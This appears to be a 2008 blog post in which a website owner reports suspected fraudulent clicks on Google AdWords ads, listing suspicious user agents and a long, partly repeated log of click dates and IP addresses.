I submitted probably hundreds of clicks in the past couple of months from networks owned by or run by the same company that were clicking on our Google ads apparently. When I tallied up the number of clicks based on analytics from our logs and compared it to the clicks in Google - I can see that a number of clicks from these networks were included in the clicks we were charged for by Google. We have very detailed logging in two forms in a way I can easily query a database to get a very accurate count.
I contacted the network from whence the nasty clicks were coming and they claimed they were not doing it. They claimed they never hit our sites. The clicks stopped as soon as I contacted them and they blocked out traffic from their networks at the firewall level, so clearly those clicks were the result of some kind of hack or maliciousness because they wouldn't block it out if it was valid.
Google responded by telling me not to worry - that they never charge for fraudulent clicks. I hope they mean that they are going to review my traffic and clicks and give me a credit...
I contacted the network from whence the nasty clicks were coming and they claimed they were not doing it. They claimed they never hit our sites. The clicks stopped as soon as I contacted them and they blocked out traffic from their networks at the firewall level, so clearly those clicks were the result of some kind of hack or maliciousness because they wouldn't block it out if it was valid.
Google responded by telling me not to worry - that they never charge for fraudulent clicks. I hope they mean that they are going to review my traffic and clicks and give me a credit...
Google Adwords Click Bots
After reviewing all the clicks on our ads last month and finding some clearly malware generated clicks on our site, I reported it to Google and waiting to hear back. The offending network has blocked out any traffic to our web sites from their network via their firewall. I suggested they turn on valid as well as invalid hits on their firewall to see where this traffic is coming from because we were getting bombed (and paying for) a huge amount of clicks from their network.
After digging deeper into network traffic I am seeing some things that I feel like Google should easily be able to block out as invalid clicks and not charge us for them. For instace I've found the following user agents in the mix:
internal zero-knowledge agent from 71.117.15.41 multiple times on 5/31/2008
VB Project from 66.233.201.171 on 6/1/2008
No user agent from 66.228.208.166 on 6/5/2008
libcurl agent from 69.41.14.151 on 5/28/2008
VB Project from 24.113.5.42 on 5/26/2008
No user agent from 75.146.62.233 on 5/26/2008
No user agent from 75.146.62.233 on 5/22/2008
No user agent from 75.146.62.233 on 5/16/2008
Additionally starting on 4/9/2008 we started to get a number of invalid requests which indicate they come from Google and I am very skeptical that these particualr requests are legitimate based on the analytics. I asked Google to stop sending us these types of referrals and it seems like we didn't get any today - I hope that they are gone for good because I am not sure the following clicks came from actual potential customers -- of note this particular IP: 206.169.110.66 also hit our site numerous times with something called "page_prefetcher".
6/9/2008 17:54 67.183.35.29
6/9/2008 14:26 96.239.200.74
6/9/2008 13:38 12.228.1.96
6/8/2008 20:53 67.228.207.202
6/7/2008 16:22 24.18.87.97
6/7/2008 12:58 67.225.66.92
6/6/2008 14:43 150.70.84.27
6/6/2008 14:07 67.135.34.242
6/6/2008 0:21 24.18.139.13
6/5/2008 17:35 4.179.53.243
6/5/2008 17:35 4.179.53.243
6/5/2008 1:15 66.228.208.166
6/3/2008 21:05 70.58.64.231
6/3/2008 19:31 76.28.185.32
6/3/2008 17:26 167.88.201.100
6/3/2008 10:59 66.235.13.106
6/3/2008 8:13 24.19.32.200
6/3/2008 1:20 75.146.62.233
6/2/2008 20:10 76.28.185.32
6/2/2008 20:02 76.28.185.32
6/2/2008 20:01 76.28.185.32
6/2/2008 17:46 216.128.111.206
6/2/2008 17:45 216.128.111.206
6/2/2008 17:43 216.128.111.206
6/2/2008 17:41 216.128.111.206
6/2/2008 17:40 216.128.111.206
6/2/2008 14:11 24.18.211.183
6/2/2008 10:02 66.224.213.198
6/1/2008 20:38 97.113.16.141
6/1/2008 17:37 66.233.201.171
6/1/2008 16:22 75.146.62.233
6/1/2008 4:54 75.146.62.233
5/31/2008 23:53 75.146.62.233
5/31/2008 20:27 67.182.151.157
5/31/2008 19:32 76.121.171.169
5/31/2008 17:05 71.117.15.41
5/31/2008 17:05 71.117.15.41
5/31/2008 17:05 71.117.15.41
5/31/2008 16:36 71.121.204.110
5/31/2008 15:12 66.147.230.40
5/31/2008 14:56 24.113.130.126
5/31/2008 13:19 71.231.107.142
5/30/2008 19:33 66.228.208.165
5/30/2008 19:33 66.228.208.165
5/30/2008 17:21 63.225.178.179
5/30/2008 15:37 216.128.111.204
5/30/2008 15:25 216.127.48.246
5/30/2008 13:47 216.254.12.195
5/30/2008 8:53 207.66.220.2
5/30/2008 7:45 150.70.84.27
5/30/2008 7:33 150.70.84.27
5/29/2008 20:54 24.16.195.38
5/29/2008 20:43 24.16.195.38
5/29/2008 19:16 66.228.208.165
5/29/2008 19:07 71.231.183.118
5/29/2008 16:12 76.22.29.101
5/29/2008 14:34 69.56.81.124
5/29/2008 12:35 69.56.81.146
5/29/2008 10:44 76.28.187.65
5/29/2008 9:05 216.127.38.230
5/29/2008 7:41 66.243.225.80
5/29/2008 6:47 66.228.208.167
5/29/2008 2:31 207.246.157.67
5/28/2008 18:25 69.41.14.151
5/28/2008 18:25 69.41.14.151
5/28/2008 13:37 66.228.208.166
5/28/2008 10:24 207.178.0.196
5/28/2008 10:18 75.172.16.64
5/28/2008 8:23 207.178.1.65
5/28/2008 8:17 70.193.81.125
5/27/2008 21:07 71.112.253.195
5/27/2008 17:14 38.100.225.210
5/27/2008 14:19 24.19.50.253
5/27/2008 13:25 66.165.27.95
5/27/2008 10:34 207.178.0.196
5/27/2008 10:15 207.178.14.6
5/26/2008 18:49 75.100.185.182
5/26/2008 17:26 71.120.229.172
5/26/2008 17:25 71.212.8.188
5/26/2008 16:58 150.70.84.48
5/26/2008 16:04 207.66.160.1
5/26/2008 16:04 76.121.42.138
5/26/2008 13:57 76.121.230.246
5/26/2008 12:34 69.29.203.249
5/26/2008 12:25 67.40.195.145
5/26/2008 12:25 67.40.195.145
5/26/2008 10:20 24.113.5.42
5/26/2008 10:12 207.178.0.196
5/26/2008 9:14 24.17.71.223
5/26/2008 8:53 24.17.71.223
5/26/2008 7:34 24.17.71.223
5/26/2008 3:47 75.146.62.233
5/25/2008 23:15 67.171.46.218
5/25/2008 20:13 150.70.84.48
5/25/2008 16:11 208.51.49.107
5/24/2008 20:51 24.113.18.222
5/24/2008 20:47 216.127.38.230
5/24/2008 20:46 24.113.18.222
5/24/2008 19:49 216.127.52.10
5/24/2008 19:48 24.113.130.126
5/24/2008 19:09 207.246.140.49
5/24/2008 15:31 207.66.160.61
5/24/2008 14:14 207.178.1.68
5/24/2008 13:22 24.21.113.66
5/24/2008 12:25 150.70.84.27
5/24/2008 12:15 216.127.48.244
5/24/2008 7:30 150.70.84.27
5/24/2008 7:29 207.66.220.2
5/23/2008 16:24 71.35.106.207
5/23/2008 15:26 98.203.214.173
5/23/2008 8:04 207.207.79.115
5/22/2008 14:30 67.168.130.61
5/22/2008 14:14 75.146.62.233
5/22/2008 12:23 24.17.217.160
5/22/2008 12:23 24.17.217.160
5/22/2008 10:08 207.178.14.1
5/21/2008 20:23 24.22.230.114
5/21/2008 15:03 71.164.20.21
5/21/2008 7:56 24.26.58.81
5/20/2008 19:20 65.101.143.10
5/20/2008 16:53 24.19.154.34
5/20/2008 14:29 65.113.243.198
5/20/2008 13:13 65.113.243.198
5/20/2008 11:29 207.66.220.2
5/20/2008 9:22 207.246.152.67
5/20/2008 8:00 207.246.152.70
5/20/2008 5:38 207.246.157.68
5/20/2008 5:23 76.28.190.90
5/20/2008 5:21 207.246.154.133
5/20/2008 3:01 207.178.0.196
5/20/2008 2:07 207.66.220.2
5/20/2008 2:03 216.240.139.9
5/20/2008 0:26 207.178.0.196
5/19/2008 17:06 70.192.106.3
5/19/2008 15:11 98.203.214.173
5/19/2008 15:09 98.203.214.173
5/19/2008 12:53 130.76.32.23
5/19/2008 12:30 71.39.132.114
5/19/2008 11:14 207.178.1.67
5/18/2008 20:24 207.246.157.65
5/18/2008 20:12 207.178.0.196
5/18/2008 19:22 68.178.78.154
5/18/2008 16:24 75.92.161.253
5/18/2008 14:34 216.127.52.12
5/18/2008 12:41 71.35.145.22
5/18/2008 11:45 207.66.220.2
5/18/2008 8:01 71.113.40.8
5/18/2008 7:46 207.178.0.196
5/17/2008 22:13 207.66.220.2
5/17/2008 16:26 207.246.154.132
5/17/2008 7:51 24.16.194.235
5/17/2008 5:51 75.146.62.233
5/16/2008 20:03 75.146.62.233
5/16/2008 15:42 155.70.23.45
5/16/2008 12:12 72.11.71.226
5/16/2008 11:07 207.246.157.69
5/16/2008 10:59 207.246.157.69
5/16/2008 5:56 207.246.140.49
5/15/2008 18:47 207.66.220.2
5/15/2008 12:34 207.178.0.196
5/15/2008 12:08 207.246.152.69
5/15/2008 12:06 207.246.152.69
5/15/2008 11:57 68.165.228.136
5/15/2008 8:08 216.127.43.132
5/15/2008 7:12 207.246.157.68
5/15/2008 7:01 216.127.48.242
5/15/2008 6:57 207.178.1.70
5/15/2008 6:50 67.160.45.57
5/15/2008 5:09 207.178.0.196
5/15/2008 5:03 207.178.57.67
5/14/2008 21:11 24.21.122.134
5/14/2008 10:21 207.178.1.67
5/14/2008 10:17 207.178.1.70
5/14/2008 10:17 207.178.1.67
5/14/2008 10:16 207.178.1.67
5/14/2008 10:15 207.178.1.67
5/14/2008 10:12 207.178.57.69
5/14/2008 6:26 207.66.220.2
5/14/2008 5:07 207.178.0.196
5/14/2008 5:04 216.127.44.11
5/14/2008 4:58 207.246.152.68
5/14/2008 4:47 207.246.157.68
5/14/2008 4:40 207.246.140.50
5/14/2008 1:05 216.127.43.134
5/14/2008 0:55 207.246.157.67
5/13/2008 23:04 216.127.48.241
5/13/2008 22:58 207.178.48.67
5/13/2008 22:55 207.178.1.68
5/13/2008 21:04 207.178.0.196
5/13/2008 20:09 207.246.157.67
5/13/2008 19:56 66.180.82.88
5/13/2008 18:43 216.127.38.228
5/13/2008 17:24 71.121.146.152
5/13/2008 15:31 207.178.0.196
5/13/2008 15:29 216.127.52.10
5/13/2008 15:25 216.127.48.244
5/13/2008 15:23 216.127.48.244
5/13/2008 13:39 207.178.1.68
5/13/2008 13:38 207.178.1.66
5/13/2008 13:36 207.178.26.2
5/13/2008 13:33 216.127.44.12
5/13/2008 13:29 216.127.44.12
5/13/2008 13:25 207.246.157.68
5/13/2008 13:22 207.246.157.68
5/13/2008 12:17 207.178.1.66
5/13/2008 9:52 216.127.52.9
5/13/2008 8:19 207.178.0.196
5/13/2008 8:03 207.178.0.196
5/13/2008 6:06 207.66.160.3
5/13/2008 4:32 216.127.48.242
5/13/2008 3:21 216.127.44.14
5/13/2008 3:20 216.127.44.14
5/13/2008 3:13 207.246.157.65
5/13/2008 3:13 207.246.157.65
5/13/2008 0:29 216.127.44.9
5/13/2008 0:14 216.127.44.14
5/12/2008 18:27 207.246.155.196
5/12/2008 18:27 207.246.155.196
5/12/2008 18:24 207.246.155.196
5/12/2008 18:12 207.178.0.196
5/12/2008 18:09 207.178.0.196
5/12/2008 18:07 207.178.0.196
5/12/2008 17:52 63.226.202.112
5/12/2008 17:40 71.231.209.183
5/12/2008 15:40 32.155.26.91
5/12/2008 13:07 207.178.1.69
5/12/2008 13:03 207.178.1.69
5/12/2008 12:47 216.127.38.228
5/12/2008 12:12 207.246.140.52
5/12/2008 12:06 207.246.140.52
5/12/2008 11:57 216.127.44.13
5/12/2008 10:45 216.127.44.11
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:47 98.203.133.46
5/12/2008 9:42 207.178.1.68
5/12/2008 1:18 207.178.0.196
5/12/2008 1:06 207.246.152.66
5/11/2008 21:41 71.231.72.47
5/11/2008 18:35 76.28.152.19
5/11/2008 17:55 67.183.123.209
5/11/2008 17:38 207.246.140.51
5/11/2008 14:57 66.180.82.88
5/11/2008 11:58 66.180.82.88
5/11/2008 9:39 207.178.0.196
5/11/2008 9:00 207.178.0.196
5/11/2008 8:54 216.127.48.241
5/11/2008 8:03 207.178.57.69
5/11/2008 6:37 98.203.133.46
5/11/2008 6:28 98.203.133.46
5/11/2008 6:15 207.178.1.69
5/11/2008 3:05 71.231.133.31
5/11/2008 2:25 207.178.1.67
5/11/2008 2:18 207.246.152.70
5/11/2008 2:10 207.246.140.50
5/11/2008 0:29 71.113.51.111
5/11/2008 0:22 207.178.0.196
5/10/2008 19:45 76.28.190.90
5/10/2008 18:35 207.246.157.69
5/10/2008 18:05 207.246.157.68
5/10/2008 17:56 216.127.48.241
5/10/2008 17:52 216.127.48.241
5/10/2008 16:25 66.180.82.88
5/10/2008 14:26 67.168.174.55
5/10/2008 13:39 216.127.38.230
5/10/2008 13:37 207.246.157.65
5/10/2008 13:37 216.127.38.230
5/10/2008 13:36 216.127.38.230
5/10/2008 12:24 207.178.0.196
5/10/2008 11:08 207.246.157.68
5/10/2008 10:58 207.178.1.69
5/10/2008 10:26 207.178.57.69
5/10/2008 10:13 216.127.52.9
5/10/2008 9:47 207.178.0.196
5/10/2008 9:36 216.127.38.230
5/10/2008 9:28 207.178.14.4
5/10/2008 9:26 207.178.14.4
5/10/2008 8:45 207.66.160.3
5/10/2008 8:42 207.66.160.3
5/10/2008 4:02 216.127.44.14
5/9/2008 20:15 67.160.58.222
5/9/2008 9:13 24.22.210.15
5/9/2008 9:13 24.22.210.15
5/8/2008 21:26 75.146.62.233
5/8/2008 17:15 206.191.173.159
5/8/2008 15:27 75.121.224.62
5/8/2008 11:14 207.178.0.196
5/8/2008 11:14 207.178.0.196
5/8/2008 11:14 207.178.0.196
5/7/2008 19:20 69.10.212.5
5/7/2008 16:48 66.180.82.88
5/7/2008 12:16 66.165.5.154
5/7/2008 11:59 24.18.210.251
5/6/2008 21:30 71.121.134.24
5/6/2008 12:47 207.178.0.196
5/6/2008 11:44 75.216.224.213
5/6/2008 9:30 150.70.84.154
5/6/2008 8:56 66.180.82.88
5/5/2008 15:11 216.240.139.9
5/5/2008 9:07 66.180.82.88
5/5/2008 6:06 24.18.187.97
5/4/2008 12:59 24.19.46.195
5/3/2008 19:13 152.117.241.94
5/3/2008 16:20 71.112.8.239
5/2/2008 14:40 67.170.104.206
5/2/2008 14:21 76.115.181.71
5/2/2008 12:14 66.213.206.2
5/1/2008 13:12 66.150.9.2
5/1/2008 13:11 65.102.63.59
4/30/2008 20:49 207.108.209.249
4/30/2008 19:21 207.200.116.71
4/30/2008 19:21 207.200.116.71
4/30/2008 16:27 208.70.118.237
4/30/2008 12:24 71.188.250.70
4/29/2008 12:55 4.242.9.82
4/29/2008 12:55 4.242.9.82
4/29/2008 11:55 67.170.95.168
4/29/2008 10:06 71.112.244.57
4/29/2008 10:04 71.112.244.57
4/27/2008 10:22 98.225.29.252
4/27/2008 7:31 24.18.228.135
4/26/2008 19:23 71.212.2.103
4/26/2008 19:01 70.125.156.68
4/26/2008 12:03 76.121.14.238
4/25/2008 14:24 146.129.247.2
4/25/2008 10:19 75.165.14.201
4/25/2008 2:55 199.117.2.58
4/24/2008 20:19 207.200.116.6
4/24/2008 20:19 207.200.116.6
4/24/2008 20:15 207.200.116.134
4/24/2008 20:15 207.200.116.134
4/24/2008 20:10 75.121.224.31
4/24/2008 16:07 65.160.238.180
4/24/2008 14:56 67.183.126.104
4/24/2008 14:24 67.183.126.104
4/22/2008 14:13 207.225.242.1
4/22/2008 10:01 64.122.250.13
4/21/2008 17:16 4.242.60.232
4/21/2008 16:50 4.242.60.232
4/21/2008 9:01 76.84.97.87
4/20/2008 19:49 24.18.132.106
4/20/2008 16:31 216.240.139.9
4/20/2008 9:00 24.113.218.28
4/20/2008 8:24 70.109.87.156
4/19/2008 9:29 67.101.1.198
4/19/2008 9:05 66.67.167.138
4/18/2008 12:16 68.55.80.153
4/18/2008 11:02 74.61.14.69
4/18/2008 8:36 216.220.163.131
4/17/2008 14:52 204.11.206.66
4/17/2008 10:54 72.160.81.9
4/17/2008 9:41 67.171.38.15
4/17/2008 7:54 70.145.72.210
4/16/2008 8:35 130.76.32.145
4/16/2008 1:08 76.22.98.254
4/15/2008 20:36 38.103.128.245
4/15/2008 11:33 63.229.10.210
4/15/2008 11:04 64.221.112.226
4/15/2008 8:11 150.70.84.27
4/14/2008 13:31 208.64.242.83
4/14/2008 10:52 38.103.128.245
4/14/2008 8:55 204.246.129.196
4/14/2008 8:17 38.103.128.245
4/14/2008 8:15 38.103.128.245
4/14/2008 8:15 38.103.128.245
4/14/2008 7:03 150.70.84.154
4/13/2008 15:04 4.242.60.93
4/13/2008 15:00 4.242.60.93
4/13/2008 14:35 4.242.60.93
4/13/2008 14:08 71.231.10.128
4/13/2008 14:08 71.231.10.128
4/13/2008 14:08 71.231.10.128
4/12/2008 16:25 75.172.87.114
4/12/2008 15:59 24.145.231.173
4/12/2008 15:26 71.249.87.226
4/12/2008 14:27 69.214.22.116
4/12/2008 12:33 207.43.224.70
4/12/2008 12:33 207.43.224.80
4/12/2008 9:57 150.70.84.27
4/12/2008 9:46 70.145.21.26
4/12/2008 9:28 74.242.96.197
4/12/2008 1:54 216.240.139.9
4/11/2008 23:57 65.101.141.82
4/11/2008 21:31 4.243.49.100
4/11/2008 8:30 67.170.85.124
4/10/2008 14:11 150.70.84.154
4/9/2008 20:26 71.127.254.195
4/9/2008 17:22 198.238.208.2
4/9/2008 15:51 199.233.178.253
4/9/2008 14:54 208.65.83.39
4/9/2008 13:44 67.183.164.154
4/9/2008 12:00 199.147.202.24
4/9/2008 11:49 199.147.202.24
4/9/2008 10:00 150.70.84.27
4/9/2008 8:41 216.20.149.124
After digging deeper into network traffic I am seeing some things that I feel like Google should easily be able to block out as invalid clicks and not charge us for them. For instace I've found the following user agents in the mix:
internal zero-knowledge agent from 71.117.15.41 multiple times on 5/31/2008
VB Project from 66.233.201.171 on 6/1/2008
No user agent from 66.228.208.166 on 6/5/2008
libcurl agent from 69.41.14.151 on 5/28/2008
VB Project from 24.113.5.42 on 5/26/2008
No user agent from 75.146.62.233 on 5/26/2008
No user agent from 75.146.62.233 on 5/22/2008
No user agent from 75.146.62.233 on 5/16/2008
Additionally starting on 4/9/2008 we started to get a number of invalid requests which indicate they come from Google and I am very skeptical that these particualr requests are legitimate based on the analytics. I asked Google to stop sending us these types of referrals and it seems like we didn't get any today - I hope that they are gone for good because I am not sure the following clicks came from actual potential customers -- of note this particular IP: 206.169.110.66 also hit our site numerous times with something called "page_prefetcher".
6/9/2008 17:54 67.183.35.29
6/9/2008 14:26 96.239.200.74
6/9/2008 13:38 12.228.1.96
6/8/2008 20:53 67.228.207.202
6/7/2008 16:22 24.18.87.97
6/7/2008 12:58 67.225.66.92
6/6/2008 14:43 150.70.84.27
6/6/2008 14:07 67.135.34.242
6/6/2008 0:21 24.18.139.13
6/5/2008 17:35 4.179.53.243
6/5/2008 17:35 4.179.53.243
6/5/2008 1:15 66.228.208.166
6/3/2008 21:05 70.58.64.231
6/3/2008 19:31 76.28.185.32
6/3/2008 17:26 167.88.201.100
6/3/2008 10:59 66.235.13.106
6/3/2008 8:13 24.19.32.200
6/3/2008 1:20 75.146.62.233
6/2/2008 20:10 76.28.185.32
6/2/2008 20:02 76.28.185.32
6/2/2008 20:01 76.28.185.32
6/2/2008 17:46 216.128.111.206
6/2/2008 17:45 216.128.111.206
6/2/2008 17:43 216.128.111.206
6/2/2008 17:41 216.128.111.206
6/2/2008 17:40 216.128.111.206
6/2/2008 14:11 24.18.211.183
6/2/2008 10:02 66.224.213.198
6/1/2008 20:38 97.113.16.141
6/1/2008 17:37 66.233.201.171
6/1/2008 16:22 75.146.62.233
6/1/2008 4:54 75.146.62.233
5/31/2008 23:53 75.146.62.233
5/31/2008 20:27 67.182.151.157
5/31/2008 19:32 76.121.171.169
5/31/2008 17:05 71.117.15.41
5/31/2008 17:05 71.117.15.41
5/31/2008 17:05 71.117.15.41
5/31/2008 16:36 71.121.204.110
5/31/2008 15:12 66.147.230.40
5/31/2008 14:56 24.113.130.126
5/31/2008 13:19 71.231.107.142
5/30/2008 19:33 66.228.208.165
5/30/2008 19:33 66.228.208.165
5/30/2008 17:21 63.225.178.179
5/30/2008 15:37 216.128.111.204
5/30/2008 15:25 216.127.48.246
5/30/2008 13:47 216.254.12.195
5/30/2008 8:53 207.66.220.2
5/30/2008 7:45 150.70.84.27
5/30/2008 7:33 150.70.84.27
5/29/2008 20:54 24.16.195.38
5/29/2008 20:43 24.16.195.38
5/29/2008 19:16 66.228.208.165
5/29/2008 19:07 71.231.183.118
5/29/2008 16:12 76.22.29.101
5/29/2008 14:34 69.56.81.124
5/29/2008 12:35 69.56.81.146
5/29/2008 10:44 76.28.187.65
5/29/2008 9:05 216.127.38.230
5/29/2008 7:41 66.243.225.80
5/29/2008 6:47 66.228.208.167
5/29/2008 2:31 207.246.157.67
5/28/2008 18:25 69.41.14.151
5/28/2008 18:25 69.41.14.151
5/28/2008 13:37 66.228.208.166
5/28/2008 10:24 207.178.0.196
5/28/2008 10:18 75.172.16.64
5/28/2008 8:23 207.178.1.65
5/28/2008 8:17 70.193.81.125
5/27/2008 21:07 71.112.253.195
5/27/2008 17:14 38.100.225.210
5/27/2008 14:19 24.19.50.253
5/27/2008 13:25 66.165.27.95
5/27/2008 10:34 207.178.0.196
5/27/2008 10:15 207.178.14.6
5/26/2008 18:49 75.100.185.182
5/26/2008 17:26 71.120.229.172
5/26/2008 17:25 71.212.8.188
5/26/2008 16:58 150.70.84.48
5/26/2008 16:04 207.66.160.1
5/26/2008 16:04 76.121.42.138
5/26/2008 13:57 76.121.230.246
5/26/2008 12:34 69.29.203.249
5/26/2008 12:25 67.40.195.145
5/26/2008 12:25 67.40.195.145
5/26/2008 10:20 24.113.5.42
5/26/2008 10:12 207.178.0.196
5/26/2008 9:14 24.17.71.223
5/26/2008 8:53 24.17.71.223
5/26/2008 7:34 24.17.71.223
5/26/2008 3:47 75.146.62.233
5/25/2008 23:15 67.171.46.218
5/25/2008 20:13 150.70.84.48
5/25/2008 16:11 208.51.49.107
5/24/2008 20:51 24.113.18.222
5/24/2008 20:47 216.127.38.230
5/24/2008 20:46 24.113.18.222
5/24/2008 19:49 216.127.52.10
5/24/2008 19:48 24.113.130.126
5/24/2008 19:09 207.246.140.49
5/24/2008 15:31 207.66.160.61
5/24/2008 14:14 207.178.1.68
5/24/2008 13:22 24.21.113.66
5/24/2008 12:25 150.70.84.27
5/24/2008 12:15 216.127.48.244
5/24/2008 7:30 150.70.84.27
5/24/2008 7:29 207.66.220.2
5/23/2008 16:24 71.35.106.207
5/23/2008 15:26 98.203.214.173
5/23/2008 8:04 207.207.79.115
5/22/2008 14:30 67.168.130.61
5/22/2008 14:14 75.146.62.233
5/22/2008 12:23 24.17.217.160
5/22/2008 12:23 24.17.217.160
5/22/2008 10:08 207.178.14.1
5/21/2008 20:23 24.22.230.114
5/21/2008 15:03 71.164.20.21
5/21/2008 7:56 24.26.58.81
5/20/2008 19:20 65.101.143.10
5/20/2008 16:53 24.19.154.34
5/20/2008 14:29 65.113.243.198
5/20/2008 13:13 65.113.243.198
5/20/2008 11:29 207.66.220.2
5/20/2008 9:22 207.246.152.67
5/20/2008 8:00 207.246.152.70
5/20/2008 5:38 207.246.157.68
5/20/2008 5:23 76.28.190.90
5/20/2008 5:21 207.246.154.133
5/20/2008 3:01 207.178.0.196
5/20/2008 2:07 207.66.220.2
5/20/2008 2:03 216.240.139.9
5/20/2008 0:26 207.178.0.196
5/19/2008 17:06 70.192.106.3
5/19/2008 15:11 98.203.214.173
5/19/2008 15:09 98.203.214.173
5/19/2008 12:53 130.76.32.23
5/19/2008 12:30 71.39.132.114
5/19/2008 11:14 207.178.1.67
5/18/2008 20:24 207.246.157.65
5/18/2008 20:12 207.178.0.196
5/18/2008 19:22 68.178.78.154
5/18/2008 16:24 75.92.161.253
5/18/2008 14:34 216.127.52.12
5/18/2008 12:41 71.35.145.22
5/18/2008 11:45 207.66.220.2
5/18/2008 8:01 71.113.40.8
5/18/2008 7:46 207.178.0.196
5/17/2008 22:13 207.66.220.2
5/17/2008 16:26 207.246.154.132
5/17/2008 7:51 24.16.194.235
5/17/2008 5:51 75.146.62.233
5/16/2008 20:03 75.146.62.233
5/16/2008 15:42 155.70.23.45
5/16/2008 12:12 72.11.71.226
5/16/2008 11:07 207.246.157.69
5/16/2008 10:59 207.246.157.69
5/16/2008 5:56 207.246.140.49
5/15/2008 18:47 207.66.220.2
5/15/2008 12:34 207.178.0.196
5/15/2008 12:08 207.246.152.69
5/15/2008 12:06 207.246.152.69
5/15/2008 11:57 68.165.228.136
5/15/2008 8:08 216.127.43.132
5/15/2008 7:12 207.246.157.68
5/15/2008 7:01 216.127.48.242
5/15/2008 6:57 207.178.1.70
5/15/2008 6:50 67.160.45.57
5/15/2008 5:09 207.178.0.196
5/15/2008 5:03 207.178.57.67
5/14/2008 21:11 24.21.122.134
5/14/2008 10:21 207.178.1.67
5/14/2008 10:17 207.178.1.70
5/14/2008 10:17 207.178.1.67
5/14/2008 10:16 207.178.1.67
5/14/2008 10:15 207.178.1.67
5/14/2008 10:12 207.178.57.69
5/14/2008 6:26 207.66.220.2
5/14/2008 5:07 207.178.0.196
5/14/2008 5:04 216.127.44.11
5/14/2008 4:58 207.246.152.68
5/14/2008 4:47 207.246.157.68
5/14/2008 4:40 207.246.140.50
5/14/2008 1:05 216.127.43.134
5/14/2008 0:55 207.246.157.67
5/13/2008 23:04 216.127.48.241
5/13/2008 22:58 207.178.48.67
5/13/2008 22:55 207.178.1.68
5/13/2008 21:04 207.178.0.196
5/13/2008 20:09 207.246.157.67
5/13/2008 19:56 66.180.82.88
5/13/2008 18:43 216.127.38.228
5/13/2008 17:24 71.121.146.152
5/13/2008 15:31 207.178.0.196
5/13/2008 15:29 216.127.52.10
5/13/2008 15:25 216.127.48.244
5/13/2008 15:23 216.127.48.244
5/13/2008 13:39 207.178.1.68
5/13/2008 13:38 207.178.1.66
5/13/2008 13:36 207.178.26.2
5/13/2008 13:33 216.127.44.12
5/13/2008 13:29 216.127.44.12
5/13/2008 13:25 207.246.157.68
5/13/2008 13:22 207.246.157.68
5/13/2008 12:17 207.178.1.66
5/13/2008 9:52 216.127.52.9
5/13/2008 8:19 207.178.0.196
5/13/2008 8:03 207.178.0.196
5/13/2008 6:06 207.66.160.3
5/13/2008 4:32 216.127.48.242
5/13/2008 3:21 216.127.44.14
5/13/2008 3:20 216.127.44.14
5/13/2008 3:13 207.246.157.65
5/13/2008 3:13 207.246.157.65
5/13/2008 0:29 216.127.44.9
5/13/2008 0:14 216.127.44.14
5/12/2008 18:27 207.246.155.196
5/12/2008 18:27 207.246.155.196
5/12/2008 18:24 207.246.155.196
5/12/2008 18:12 207.178.0.196
5/12/2008 18:09 207.178.0.196
5/12/2008 18:07 207.178.0.196
5/12/2008 17:52 63.226.202.112
5/12/2008 17:40 71.231.209.183
5/12/2008 15:40 32.155.26.91
5/12/2008 13:07 207.178.1.69
5/12/2008 13:03 207.178.1.69
5/12/2008 12:47 216.127.38.228
5/12/2008 12:12 207.246.140.52
5/12/2008 12:06 207.246.140.52
5/12/2008 11:57 216.127.44.13
5/12/2008 10:45 216.127.44.11
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:47 98.203.133.46
5/12/2008 9:42 207.178.1.68
5/12/2008 1:18 207.178.0.196
5/12/2008 1:06 207.246.152.66
5/11/2008 21:41 71.231.72.47
5/11/2008 18:35 76.28.152.19
5/11/2008 17:55 67.183.123.209
5/11/2008 17:38 207.246.140.51
5/11/2008 14:57 66.180.82.88
5/11/2008 11:58 66.180.82.88
5/11/2008 9:39 207.178.0.196
5/11/2008 9:00 207.178.0.196
5/11/2008 8:54 216.127.48.241
5/11/2008 8:03 207.178.57.69
5/11/2008 6:37 98.203.133.46
5/11/2008 6:28 98.203.133.46
5/11/2008 6:15 207.178.1.69
5/11/2008 3:05 71.231.133.31
5/11/2008 2:25 207.178.1.67
5/11/2008 2:18 207.246.152.70
5/11/2008 2:10 207.246.140.50
5/11/2008 0:29 71.113.51.111
5/11/2008 0:22 207.178.0.196
5/10/2008 19:45 76.28.190.90
5/10/2008 18:35 207.246.157.69
5/10/2008 18:05 207.246.157.68
5/10/2008 17:56 216.127.48.241
5/10/2008 17:52 216.127.48.241
5/10/2008 16:25 66.180.82.88
5/10/2008 14:26 67.168.174.55
5/10/2008 13:39 216.127.38.230
5/10/2008 13:37 207.246.157.65
5/10/2008 13:37 216.127.38.230
5/10/2008 13:36 216.127.38.230
5/10/2008 12:24 207.178.0.196
5/10/2008 11:08 207.246.157.68
5/10/2008 10:58 207.178.1.69
5/10/2008 10:26 207.178.57.69
5/10/2008 10:13 216.127.52.9
5/10/2008 9:47 207.178.0.196
5/10/2008 9:36 216.127.38.230
5/10/2008 9:28 207.178.14.4
5/10/2008 9:26 207.178.14.4
5/10/2008 8:45 207.66.160.3
5/10/2008 8:42 207.66.160.3
5/10/2008 4:02 216.127.44.14
5/9/2008 20:15 67.160.58.222
5/9/2008 9:13 24.22.210.15
5/9/2008 9:13 24.22.210.15
5/8/2008 21:26 75.146.62.233
5/8/2008 17:15 206.191.173.159
5/8/2008 15:27 75.121.224.62
5/8/2008 11:14 207.178.0.196
5/8/2008 11:14 207.178.0.196
5/8/2008 11:14 207.178.0.196
5/7/2008 19:20 69.10.212.5
5/7/2008 16:48 66.180.82.88
5/7/2008 12:16 66.165.5.154
5/7/2008 11:59 24.18.210.251
5/6/2008 21:30 71.121.134.24
5/6/2008 12:47 207.178.0.196
5/6/2008 11:44 75.216.224.213
5/6/2008 9:30 150.70.84.154
5/6/2008 8:56 66.180.82.88
5/5/2008 15:11 216.240.139.9
5/5/2008 9:07 66.180.82.88
5/5/2008 6:06 24.18.187.97
5/4/2008 12:59 24.19.46.195
5/3/2008 19:13 152.117.241.94
5/3/2008 16:20 71.112.8.239
5/2/2008 14:40 67.170.104.206
5/2/2008 14:21 76.115.181.71
5/2/2008 12:14 66.213.206.2
5/1/2008 13:12 66.150.9.2
5/1/2008 13:11 65.102.63.59
4/30/2008 20:49 207.108.209.249
4/30/2008 19:21 207.200.116.71
